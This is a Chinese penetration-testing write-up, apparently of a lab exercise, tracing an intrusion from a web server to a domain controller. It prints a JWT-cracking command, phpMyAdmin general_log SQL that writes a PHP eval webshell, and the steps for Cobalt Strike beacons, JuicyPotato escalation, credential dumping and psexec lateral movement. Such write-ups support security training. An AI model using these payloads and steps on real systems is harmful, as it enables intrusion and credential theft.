【攻防实战】Ueditor编辑器文件上传联动CS远控打穿四层内网(下)

当一个的心中有更高的山峰想去攀登时,他就不会在意脚下的泥沼,他才可能用最平静的方式,去面对一般人难以承受的痛苦

前言

网络安全技术学习,承认⾃⼰的弱点不是丑事,只有对原理了然于⼼,才能突破更多的限制。

拥有快速学习能力的安全研究员,是不能有短板的,有的只能是大量的标准板和几块长板。

知识⾯,决定看到的攻击⾯有多⼴;知识链,决定发动的杀伤链有多深。

最终成果

最终收获的成果如下

网络拓扑图

本次实战绘制出来的网络拓扑图如下:

第三层:12server-web2

信息搜集

查看内网第三层网段存活的机器

复制代码
arp -a 

可以看到内网第二层网络还有一台xxx.xxx22.130机器存活

开代理访问12server-web2

通过12server-data1开代理访问12server-web2

cs服务器的地址和端口

信息搜集

代理端口扫描

目录扫描

访问

复制代码
http://xxx.xxx22.130/a.php

目录扫描发现报错页面得知为phpstudy_pro

访问80端口的web服务

复制代码
http://xxx.xxx22.130/

JWT爆破

登录请求中 , 在token中发现jwt认证

jwt的特征就是前两段是base64编码(去掉==),最后一段是秘钥,然后点号拼接

爆破工具 jwt_tool(github直接下载)工具

复制代码
git clone https://github.com/ticarpi/jwt_tool.git

爆破的命令

复制代码
python3 jwt_tool.py xxx -C -d xxx.txt

成功爆破出秘钥:

复制代码
xxx is the CORRECT key!

JWT加解密

admin用户签名后的jwt

首先对浏览器代理进行配置

其次对burp进行配置

和浏览器代理同一配置

和代理同一配置

抓取数据包修改X-token

以admin身份登陆进去,之后发现后台什么都没有

phpmyadmin写日志拿shell

根据上面目录扫描的结果得出是phpstudypro,本地搭建测试安装phpmyadmin,找到默认路径phpmyadmin4.8.5

复制代码
http://xxx.xxx22.130/phpmyadmin4.8.5

root和jwt跑出的key:xxx 登陆

利用phpmyadmin日志

复制代码
show variables  like  '%general%';
SET GLOBAL general_log='on'; SHOW VARIABLES LIKE '%general%';
SET GLOBAL general_log_file='C:/phpStudy_pro/www/shell.php';
SELECT '<?php eval($_POST["cmd"]);?>'

写入一句话

蚁剑连接

地址:

复制代码
http://xxx.xxx22.130/shell.php

密码:

复制代码
cmd
复制代码
ipconfig

查看内网发现很幸运还有其他网段

复制代码
whoami

查看用户权限直接是administrator权限

上线cs

12server-data1设置中转监听

选择内网可以访问到的目标

生成木马,通过蚁剑上传到12server-web2,执行木马,成功上线cs

土豆提权

复制代码
JuicyPotato (ms16-075)

提权成功

获取凭据

复制代码
logonpasswords 

获取凭据

查看凭据

破解凭据,得到本地管理员的账号密码:

远程连接

挂代理远程连接

成功连接

第四层:12server-data2

信息搜集

复制代码
net view

查看目标

发现内网还有一台12server-data2和一台16server-dc1

查看域管

查看域控详细信息

查看域用户

获取域控NTML并进行解密

psexec进行横向

有域内机器的明文密码并且域域内机器是开放445端口的,所以可以尝试psexec进行横向。

使用cs自带插件

首先设置smb监听

从目标出发

选择内网可以访问到的目标

上线cs

成功上线cs

第四层:12server-dc1

psexec进行横向

有域控的明文密码并且域控是开放445端口的,所以可以尝试psexec进行横向。

选择内网可以访问到的目标

上线cs

成功上线cs

最终收获的成果如下

网络安全感悟

网络安全是一个长期的过程,因为网络安全没有终点,不管是网络安全企业,还是在网络安全行业各种不同方向的从业人员,不管你选择哪个方向,只有在这条路上坚持不懈,才能在这条路上走的更远,走的更好,不然你肯定走不远,迟早会转行或者被淘汰,把时间全浪费掉。

如果你觉得自己是真的热爱网络安全这个行业,坚持走下去就可以了,不用去管别人,现在就是一个大浪淘金的时代,淘下去的是沙子,留下来的才是金子,正所谓,千淘万漉虽辛苦,吹尽狂沙始到金,网络安全的路还很长,一生只做一件事,坚持做好一件事!

声明

文笔生疏,措辞浅薄,敬请各位大佬不吝赐教,万分感谢。

免责声明:由于传播或利用此文所提供的信息、技术或方法而造成的任何直接或间接的后果及损失,均由使用者本人负责, 文章作者不为此承担任何责任。

转载声明:平凡安全 拥有对此文章的修改和解释权,如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章的内容,不得以任何方式将其用于商业目的。

复制代码
CSDN:
https://rdyx0.blog.csdn.net/

公众号:
https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg5NTU2NjA1Mw==&action=getalbum&album_id=1696286248027357190&scene=173&from_msgid=2247485408&from_itemidx=1&count=3&nolastread=1#wechat_redirect

博客:
https://rdyx0.github.io/

先知社区:
https://xz.aliyun.com/u/37846

SecIN:
https://www.sec-in.com/author/3097

FreeBuf:
https://www.freebuf.com/author/%E5%9B%BD%E6%9C%8D%E6%9C%80%E5%BC%BA%E6%B8%97%E9%80%8F%E6%8E%8C%E6%8E%A7%E8%80%85
相关推荐
小白勇闯网安圈21 小时前
unserialize3、php_rce、Web_php_include、warmup、NewsCenter
sql·网络安全·web
bleach-1 天前
buuctf系列解题思路祥讲--[ZJCTF 2019]NiZhuanSiWei1——文件包含漏洞和伪协议的利用
安全·web安全·网络安全·php
bleach-1 天前
文件描述符及Linux下利用反弹shell的各种方法
linux·websocket·web安全·网络安全·系统安全·信息与通信
骆驼10241 天前
交换机ACL与防火墙的区别
网络安全·acl·状态检测
ZKNOW甄知科技1 天前
低代码 ITSM 知识管理平台:驱动企业数智化运维的新引擎
运维·服务器·人工智能·低代码·网络安全·自动化
白帽黑客-晨哥1 天前
OWASP Top 10 2024 深度解析:Web安全新威胁与防御策略
安全·web安全·网络安全·漏洞挖掘·副业
独行soc1 天前
2025年渗透测试面试题总结-275(题目+回答)
网络·python·安全·web安全·网络安全·渗透测试·安全狮
码农12138号2 天前
服务端请求伪造-SSRF 学习笔记
笔记·web安全·网络安全·ctf·ssrf·服务端请求伪造
今日上上签07072 天前
山东大学软件学院信息安全导论2025往年回忆版
网络安全·信息安全·山东大学·软件学院·导论·往年题·回忆版
漏洞文库-Web安全2 天前
AWD比赛随笔
开发语言·python·安全·web安全·网络安全·ctf·awd